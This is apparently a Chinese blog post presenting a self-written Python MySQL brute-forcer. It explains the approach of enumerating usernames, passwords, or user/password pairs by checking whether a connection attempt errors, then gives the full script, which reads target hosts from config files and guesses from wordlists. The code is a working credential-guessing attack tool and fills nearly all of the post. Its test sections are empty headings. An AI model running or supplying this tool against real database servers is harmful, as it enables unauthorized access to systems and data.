前言:
今天已经期末考完,睡了个觉起床写了个
mysql爆破器.
思路:
1.爆破用户->用户存在的话不会报错反之报错
2.爆破密码->密码正确不会报错反之报错
3.用户名和密码一起爆破->用户名和密码正确不会报错反之报错
用到的模块:
optparser
pymysql
configparser
os
代码:
import pymysql
import optparse
import os
import configparser def main():
parser=optparse.OptionParser()
parser.add_option('-u',dest='username',help='MySQL username of blasting')
parser.add_option('-p',dest='password',help='MySQL password of blasting')
parser.add_option('-a',action='store_true',dest='all',help='MySQL all of blasting')
parser.add_option('-U',dest='zhidinusername',help='Configuration parameters for all: specify user dictionary')
parser.add_option('-P',dest='zhidinpassword',help='Configuration parameters for all: specify password dictionary')
(options,args)=parser.parse_args()
if options.username:
file=options.username
usernamepo(file)
elif options.password:
file2=options.password
passwordpo(file2)
elif options.all and options.zhidinusername and options.zhidinpassword:
un=options.zhidinusername
pd=options.zhidinpassword
allpo(un,pd)
else:
parser.print_help()
exit() def usernamepo(file):
cx=open('{}'.format(file),'r')
if os.path.exists('config.ini'):
print('[+]Config.ini ok')
else:
print('[-]Config.ini Not Found')
exit() print('[*]Read the configuration file information')
cf=configparser.ConfigParser()
cf.read('config.ini')
host=cf.get('config','host')
port=cf.get('config','port')
password=cf.get('config','password')
print('[/]-------Config.ini-------')
print('[+]Host:{}'.format(host))
print('[+]Port:{}'.format(port))
print('[+]password{}'.format(password)) print('[/]------User.txt----------')
if os.path.exists(file):
print('[+]User.txt ok')
else:
print('[-]User.txt Not Found') print('[/]------Mysql blasting------')
for k in cx.readlines():
try:
db=pymysql.connect(host,k.strip(),password)
print('[+]Mysql Username in {}'.format(k.strip()))
except Exception as g:
print('[-]Not Username:{},and Error{}'.format(k.strip(),g)) def passwordpo(file2):
cx = open('{}'.format(file2), 'r')
if os.path.exists('config.ini'):
print('[+]Config.ini ok')
else:
print('[-]Config.ini Not Found')
exit() print('[*]Read the configuration file information')
cf = configparser.ConfigParser()
cf.read('config2.ini')
host = cf.get('config', 'host')
port = cf.get('config', 'port')
username = cf.get('config', 'username')
print('[/]-------Config.ini-------')
print('[+]Host:{}'.format(host))
print('[+]Port:{}'.format(port))
print('[+]username{}'.format(username)) print('[/]------passwd.txt----------')
if os.path.exists(file2):
print('[+]Passwd.txt ok')
else:
print('[-]Passwd.txt Not Found') print('[/]------Mysql blasting------')
for k in cx.readlines():
try:
db = pymysql.connect(host, username, k.strip())
print('[+]Mysql Password in {}'.format(k.strip()))
except Exception as g:
print('[-]Not Password:{},and Error{}'.format(k.strip(), g)) def allpo(un,pd):
user=open('{}'.format(un),'r')
passs=open('{}'.format(pd),'r')
usern=[]
passn=[]
if os.path.exists(un):
print('[+]Username.txt is ok')
else:
print('[-]Not Found username.txt') if os.path.exists(pd):
print('[+]Password.txt is ok')
else:
print('[-]Not Found password.txt') if os.path.exists('config3.ini'):
print('[+]Config3.ini ok')
else:
print('[-]Config3.ini Not Found')
exit() cf=configparser.ConfigParser()
print('[/---------cofnig3.ini-------]')
cf.read('config3.ini')
host=cf.get('config','host')
print('[+]host:{}'.format(host)) print('[/]------Mysql blasting------')
for u in user.readlines():
usern.append(u.strip())
for y in passs.readlines():
passn.append(y.strip())
for g in range(0,len(usern)):
try:
dk=pymysql.connect(host,usern[g],passn[g])
print('[+]Username:{} and password:{}'.format(usern[g],passn[g]))
except Exception as p:
print('[-]Not username:{} and password:{} and Error:{}'.format(usern[g],passn[g],p)) if __name__ == '__main__':
main()
-u测试:
-p测试:
-a测试:
实际连接: